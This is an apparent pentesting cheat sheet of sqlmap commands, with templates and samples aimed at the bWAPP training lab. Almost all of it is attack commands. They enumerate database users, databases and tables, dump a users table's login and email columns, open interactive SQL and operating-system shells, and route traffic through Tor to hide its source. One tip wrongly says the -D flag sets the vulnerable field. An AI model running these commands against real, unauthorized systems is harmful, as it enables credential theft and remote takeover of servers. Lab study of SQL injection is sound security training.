[SQLMAP]
PRE-REQS: 1. vulnerable field 2. auth required ? 0x1: GET BANNERsqlmap -u "INSERT_VULN_URL" --cookie=" " -b
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -b
0x2: GET DATABASE USERS [CURRENT]sqlmap -u "INSERT_VULN_URL" --cookie=" " --users
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --users
0x3: GET DATABASESsqlmap -u "INSERT_VULN_URL" --cookie=" " --dbs
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --dbs
0x4: GET TABLESsqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME --tables
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP --tables
0x5: GET COLUMNS FROM TABLEsqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME --columns
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users --columns
0x6: DUMP A TABLEsqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME --dump
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users --dump
0x7: DUMP SPECIFIC COLUMNSsqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME -C column_name1,column_name2 --dump
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users -C login,email --dump
0x8: GET INTERACTIVE DB SHELLsqlmap -u "INSERT_VULN_URL" --cookie=" " --sql-shell
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --sql-shell
0x9: GET SYSTEM OS SHELLsqlmap -u "INSERT_VULN_URL" --cookie=" " --os-shell
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --os-shell
0x10: USE PROXY TORsqlmap --tor --tor-type=SOCKS5 --check-tor -u "INSERT_VULN_URL" --cookie=" " -b
SAMPLE: sqlmap --tor --tor-type=SOCKS5 --check-tor -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -b
0x11: EXPLOIT SPECIFIC TECHNIQUEsqlmap -u "INSERT_VULN_URL" --cookie=" " --technique=?
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --technique=U
0x12: USE REQUEST AS FILEsqlmap -r [request_filename]
SAMPLE: sqlmap -r request.txt
NOTE: It can be used to validate entire request for any vulnerability. --is-dba = to check if the current user is dba, reuslt will be true or false -p = specify the vuln parameter if it is not clear NOTES: 1. Vulnerable field can be specified with -D flag. 2. Most of time file results are stored in "/home/USER/.local/share/sqlmap/output/..." 3. Use burpsuite to intercept the traffic to know more about the authentication/session used 4. Copy request from burpsuite to use it using sqlmap. 5. Request file of a login form can be used to see if the parameters are vulnerable.
©® - Since 2023